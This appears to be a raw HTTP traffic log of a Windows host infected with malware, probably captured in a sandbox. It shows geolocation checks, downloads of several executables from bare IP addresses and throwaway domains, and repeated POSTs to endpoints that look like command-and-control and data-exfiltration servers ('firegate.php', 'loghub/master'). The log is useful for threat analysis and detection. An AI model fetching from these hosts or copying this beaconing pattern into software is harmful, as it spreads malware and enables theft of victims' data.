HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:38:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-control: max-age=28800 X-IPLB-Request-ID: AC46E919:7E12_93878F2E:0050_64EBE8DE_21370931:2467B X-IPLB-Instance: 30783 CF-Cache-Status: HIT Age: 919 Last-Modified: Mon, 28 Aug 2023 00:22:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jiA7sHX9VQwsG88zQ6W6Rghvpii%2BmsLRUTHDbKYhUiMfVVGiwiq0pm1b%2BpiRvqtPnciX3hBjgDEGM5OZKS0yZFRv6%2Bp7hqtxkzOKe0ypc5qjuRzWtf2dc%2BwvIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7fd87d810d028344-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:38:14 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: http*://*db-ip.com Cache-control: max-age=180 X-IPLB-Request-ID: AC46E9C5:6E44_93878F2E:0050_64EBEC76_21308F6B:2467A X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lj9JKIpL1fQ3N3YEBlV49LcswyMB%2BsjekJhGnRWqOuNrXiLAG2VuDqYPBDbRFMTcIlbKKw3%2F9U11kh8e3Hv7li6FmNkHdW1bxWchExApiTrhoZPpbkGZAveZe6wSuYk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7fd87d820f2d835a-KIX alt-svc: h3=":443"; ma=86400

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9064870619319032937_xW5ytouaGRJ0CZnS0pwDePXLY79zmSIN6zCankkqdu4; remixlgck=b5f64a3fe52dc9a62c; remixstid=547722278_PcKxhIMV35sMKmxilPhKXrWYz2z9BIitwjdgxEFRzwH

HTTP/1.1 200 OK Server: kittenx Date: Mon, 28 Aug 2023 00:38:26 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 286703 Connection: keep-alive X-Powered-By: KPHP/7.4.114476 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc44017378_668486332?hash=BhRIDxpzULlbXK2tKkcXiuoUkEN2dwCkZOYOzQcmo7H&dl=FDJjPlpT0sFHWyDa952v0WGrE3O4diq55i6OiBzVvCP&api=1&no_preview=1#tmwvr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9064870619319032937_xW5ytouaGRJ0CZnS0pwDePXLY79zmSIN6zCankkqdu4; remixlgck=b5f64a3fe52dc9a62c; remixstid=547722278_PcKxhIMV35sMKmxilPhKXrWYz2z9BIitwjdgxEFRzwH

HTTP/1.1 302 Found Server: kittenx Date: Mon, 28 Aug 2023 00:38:33 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114476 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c909218/u44017378/docs/d2/a123e4d9467e/tmvwr.bmp?extra=dw3ig29aP3yneS_TLS58bIOpD3nvHS4hyj20IHzV4auTqlcYk7B3PTmG39G-DIsuZibYbb5DJwmuYhj-eeAZU_akb9ZZdKKH3i2dbrzniwCU6siKujeSKY42r-Yjhvn2HFKIbVb7ik8qBPQk X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909218/u44017378/docs/d2/a123e4d9467e/tmvwr.bmp?extra=dw3ig29aP3yneS_TLS58bIOpD3nvHS4hyj20IHzV4auTqlcYk7B3PTmG39G-DIsuZibYbb5DJwmuYhj-eeAZU_akb9ZZdKKH3i2dbrzniwCU6siKujeSKY42r-Yjhvn2HFKIbVb7ik8qBPQk HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Mon, 28 Aug 2023 00:38:34 GMT Content-Type: image/x-ms-bmp Content-Length: 6029628 Connection: keep-alive Last-Modified: Sun, 27 Aug 2023 11:19:27 GMT ETag: "64eb313f-5c013c" Expires: Wed, 27 Sep 2023 00:38:34 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:16 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:17 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:24 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 3992 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /info/img0581.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.231 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Length: 848384 Content-Type: application/octet-stream Last-Modified: Mon, 28 Aug 2023 08:36:33 GMT Accept-Ranges: bytes ETag: "c0b33dc08ad9d91:0" Server: Microsoft-IIS/10.0 Date: Mon, 28 Aug 2023 08:37:25 GMT

HEAD /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 87.121.221.58 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:25 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 28 Aug 2023 00:30:01 GMT ETag: "6bc00-603f0cb82887b" Accept-Ranges: bytes Content-Length: 441344 Content-Type: application/x-msdos-program

HEAD /m/iela2f5.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: jjz.alie3ksgbb.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:25 GMT Content-Type: application/octet-stream Content-Length: 430080 Connection: keep-alive Last-Modified: Sun, 27 Aug 2023 08:16:07 GMT ETag: "64eb0647-69000" Cache-Control: max-age=14400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=buE%2BS7zd9tN2V4IX%2FJNB1Ae3VrFkIuIT8aiLC0NKP822qsqVbTC3zyw6nuQC6Q3lEx4%2Fvw0tynvdexUrpSss%2F%2FVAws90wj7%2FaKFKG20Wxu4uqPZ%2BSsucSnjvtg1PPY%2BOwA5f2Ss%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7fd87c5058578310-KIX alt-svc: h3=":443"; ma=86400

HEAD /autorun.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: autorun.ddns.net Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:25 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 Last-Modified: Sun, 27 Aug 2023 19:56:00 GMT ETag: "3be00-603ecf788fa3a" Accept-Ranges: bytes Content-Length: 245248 Content-Type: application/x-msdownload

GET /m/iela2f5.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: jjz.alie3ksgbb.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:25 GMT Content-Type: application/octet-stream Content-Length: 430080 Connection: keep-alive Last-Modified: Sun, 27 Aug 2023 08:16:07 GMT ETag: "64eb0647-69000" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 0 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Em9JgSn3v5uL2rMbeTaDzyYj8K9XKr2yOXj%2Fl3zqKznu2ytUk%2B3AhfYTqdeS798RyNxluEk4jshNSqIaf8pmnkvHYSVdazIuQqVse8UF46%2FNXl1tP1bTx2laEFvlaOoB4h5fhQo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7fd87c5169d08310-KIX alt-svc: h3=":443"; ma=86400

GET /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 87.121.221.58 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:25 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 28 Aug 2023 00:30:01 GMT ETag: "6bc00-603f0cb82887b" Accept-Ranges: bytes Content-Length: 441344 Content-Type: application/x-msdos-program

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Mon, 21 Aug 2023 22:08:28 GMT ETag: "37d-603761e33cf00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Mon, 28 Aug 2023 01:37:25 GMT Date: Mon, 28 Aug 2023 00:37:25 GMT Connection: keep-alive

GET /autorun.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: autorun.ddns.net Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:25 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 Last-Modified: Sun, 27 Aug 2023 19:56:00 GMT ETag: "3be00-603ecf788fa3a" Accept-Ranges: bytes Content-Length: 245248 Content-Type: application/x-msdownload

GET /info/img0581.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.231 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 28 Aug 2023 08:36:33 GMT Accept-Ranges: bytes ETag: "c0b33dc08ad9d91:0" Server: Microsoft-IIS/10.0 Date: Mon, 28 Aug 2023 08:37:25 GMT Content-Length: 848384

GET /4.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 176.113.115.84:8080 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:37:26 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="ra6lipaml9o3xzc.exe" Transfer-Encoding: chunked Content-Type: application/octet-stream

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 497 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:38:10 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:38:12 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:38:12 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:38:12 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 301 Moved Permanently Date: Mon, 28 Aug 2023 00:38:20 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Mon, 28 Aug 2023 01:38:20 GMT Location: https://www.maxmind.com/geoip/v2.1/city/me Server: cloudflare CF-RAY: 7fd87dabdc9d3514-ICN

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 3761 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:38:21 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:38:22 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Mon, 28 Aug 2023 00:38:29 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 768 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /loa.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 28 Aug 2023 00:38:30 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive

HEAD /super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 28 Aug 2023 00:38:30 GMT Content-Type: application/octet-stream Content-Length: 509440 Last-Modified: Sun, 27 Aug 2023 07:07:07 GMT Connection: keep-alive ETag: "64eaf61b-7c600" Accept-Ranges: bytes

GET /super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 28 Aug 2023 00:38:30 GMT Content-Type: application/octet-stream Content-Length: 509440 Last-Modified: Sun, 27 Aug 2023 07:07:07 GMT Connection: keep-alive ETag: "64eaf61b-7c600" Accept-Ranges: bytes

GET /loa.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Cache-Control: no-cache

HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 28 Aug 2023 00:38:30 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive

HEAD /f/fikim0809331.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 230809204625331.nes.dtf99.top Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Caddy Status: 404 Not Found X-Powered-By: PHP/7.3.25 Date: Mon, 28 Aug 2023 00:38:31 GMT

GET /f/fikim0809331.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 230809204625331.nes.dtf99.top Cache-Control: no-cache

HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Caddy Status: 404 Not Found X-Powered-By: PHP/7.3.25 Date: Mon, 28 Aug 2023 00:38:31 GMT Content-Length: 17

POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=Wm1SwcASEGc2poqQPFIk Content-Length: 213 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: 193.233.254.61 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 28 Aug 2023 00:38:34 GMT Content-Type: text/html; charset=utf-8 Content-Length: 120 Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin

POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=Wm1SwcASEGc2poqQPFIk Content-Length: 1170 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: 193.233.254.61 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 28 Aug 2023 00:38:34 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin

POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=Wm1SwcASEGc2poqQPFIk Content-Length: 284 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: 193.233.254.61 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 28 Aug 2023 00:38:36 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2292 Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin

POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=Wm1SwcASEGc2poqQPFIk Content-Length: 276 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: 193.233.254.61 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 28 Aug 2023 00:38:36 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4316 Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin

POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=Wm1SwcASEGc2poqQPFIk Content-Length: 272 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: 193.233.254.61 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 28 Aug 2023 00:38:36 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1417736 Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 285 Host: 45.15.156.229

POST /0bjdn2Z/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 45.9.74.80 Content-Length: 90 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 28 Aug 2023 00:38:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive